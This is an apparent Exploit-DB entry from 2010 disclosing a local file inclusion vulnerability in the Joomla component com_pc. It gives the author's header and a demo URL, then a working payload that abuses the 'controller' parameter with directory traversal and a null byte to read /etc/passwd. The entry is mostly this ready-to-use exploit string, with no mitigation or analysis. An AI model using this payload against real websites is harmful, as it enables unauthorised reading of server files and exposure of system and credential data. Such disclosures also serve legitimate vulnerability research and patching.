Joomla! Component com_pc - Local File Inclusion

EDB-ID:

11168

CVE:

N/A


Author:

Pyske

Type:

webapps


Platform:

PHP

Date:

2010-01-17


<------------------- header data start ------------------- >

#############################################################
# Joomla Component com_pc LFI Vulnerability
#############################################################

# Author : Pyske


# Name : com_pc


# Home : www.cyber-warrior.org


# Greez : N0kt4 , fl0rix , F0RTS3V3N , KaBaDaY&#305; , Blackapple All Cyber-warrior


# Bug Type : Local File Inlusion



# Demo Vuln. : http://server/index.php?option=com_pc&controller= [LFI]



#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

path /index.php?option=com_pc&controller=index.php?option=com_pc&controller=../../../../../../../etc/passwd%00

< -- bug code end of -- >